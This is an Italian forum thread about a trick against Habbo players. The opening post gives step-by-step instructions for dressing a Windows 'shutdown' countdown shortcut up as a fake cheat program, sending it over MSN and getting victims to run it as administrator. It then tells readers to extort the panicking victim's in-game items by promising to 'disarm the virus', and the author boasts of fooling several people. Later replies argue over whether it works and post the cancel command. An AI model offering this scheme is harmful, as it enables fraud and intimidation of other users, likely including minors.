Release MegaTruffa by TheVox222 (LEGGETE!)

TheVox222

Nuovo utente
Autore del topic
24 Dicembre 2008
31
0
Miglior risposta
0
Salve ragazzi: Ho scoperto un nuovo trucco per arricchirvi un pò con i n00b di habbo:

- Andate sul desktop e cliccate col tasto destro -->Poi su Nuovo -->E poi su Collegamento. Perfetto ora vi apparirà sul desktop il "Nuovo Collegamento" e una schermata con uno spazio bianco dove scrivere, voi scriverete così:

shutdown -s -t 120 -c "Trojan Virus"

di questa frase potete modificare il "120" che sono i secondi del count down e la frase "Trojan Virus Activated" che leggerà il destinatario.

Ora premete avanti, vi appare la scritta "shutdown" questo è come verrà intitolato il collegamento, ma voi mettete il nome di un programma script per habbo da passare al cliente: per esempio "Habbux 2.7".

Ora cliccate su FINE e vi apparirà sul desktop il collegamento chiamato "Habbux 2.7", però c'è un problemino, il collegamento è privo di immaggine! Cliccate col destro su di lui --> poi su proprietà --> e infine su Cambia icona...

Vi appare un messaggio, date OK e scegliete tra le icone elencate nella schermata quella che vi sembra più opportuna per il file o caricatene una vostra personale.

Una volta scelta date l'OK e vi si chiuderà la schermatina, poi ridate un'altra volta OK sulla schermata delle proprietà e... VOILA! Il vostro collegamento ha ora anche un'immaggine!

Ora l'ultimo passo: create una cartella e metteteci dentro il collegamento, poi se volete fare scena createci anche un blocco notes e metteteci qualche codice per rendere la cosa più realistica.

Ora cliccate col destro sulla cartella contenete il collegamento e mettete "Aggiungi all'archivio shutdown.rar".

Così facendo potrete inviare questa cartella per MSN:

una volta inviata, se il n00b accetta gli spiegate passo passo come fare: Estrarre la cartella dal .rar, aprirla, cliccare col tasto destro del mouse sul collegamento e aprire con amministratore (altrimenti non funziona).

Quando lui farà ciò che vi ha detto si aprirà una grande schermata con scritto che il PC verrà riavviato dall'amministratore e sotto oltre al count down la frase che voi metterete, es: "Trojan Virus Activated, il virus può essere disattivato solo dal mittente".

Siccome questo count down non si può chiudere in nessun modo, (Tranne staccare la batteria al pc), è importante però che su habbo rimaniate nella stessa stanza per evitare perdite di tempo!

Spiegate al nabbo che se vi dà i furni voi disinnescherete il virus, lui in preda al panico con il 70% delle probabilità lo farà, e cosi voi avrete il tempo di mettere i furni nella stanza del vostro PG originale perchè a lui si spegnerà il PC e perderà tempo per rintracciarvi! ::emoji_relieved:

Mi dispiace ma le foto non me le fà mettere, se vi serve ancora aiuto contattatemi in privato.

P.S= Se avete programmi script con il tele nuke passatemeli!

CIAO E BUON DIVERTIMENTO! :banana:
 
Si lo conosco, ma non lo mai usata per Habbo
lo usavo solo epr fare i dispetti alla gente xD
scrivevo: Hahahah Allo scadere del tempo il tuo PC si romperà xD
 
Guarda che funziona, lo ho fatto a 4 o 5 persone ci sono cascate tutte in pieno, basta saperlo fare bene :emoji_smiley:
ve
Comunque si e no darkdead, ho visto un video su come fare il Fake Virus ma l'idea di habbo l'ho inventata io, se mi passate programmi sctipting ve lo dimostro che la gente ci casca.
Tanta gente casca ancora su trucchi più banali, vuoi che non casca su questo? :S
 
Gli screen non sò capace a metterli, senò vi mettevo 5 conversazioni di msn in cui ci sono cascati tutti e 5 i destinatari, se avessi un programma scirpt buono vi dimostro che con una giornata a fare sti trucchi riempio 1 stanza minimo di roba...
 
Per disattivarla basta andare su start => esegui => scrivete: shutdown -a => premete invio.
Et voilà disattivato.
Comunque nn ci casca nessuno lol
 
Quoto Capitan uncino....

Bah...Per me si perde solo tempo, ci cascano di più con un fake programm fidati xD
 
Infatti :sisi: , Io Credo Che Sia Una Cosa Al Quanto Inutile Dato Che Si Tratta Di Un Semplicissimo Shoutdown In .bat..

Saluti

:bye:
 
lol , non si può disattivare in nessun modo xD
dal cmd > shutdown -a
preferisco il bat di alberto
 
E vabè ma nessuno è nato imparato, io è dal 24 dicembre, proprio quando mi sono iscritto a Sciax che sono entrato nel campo degli script :S abbiate pazienza
 
Ultima modifica: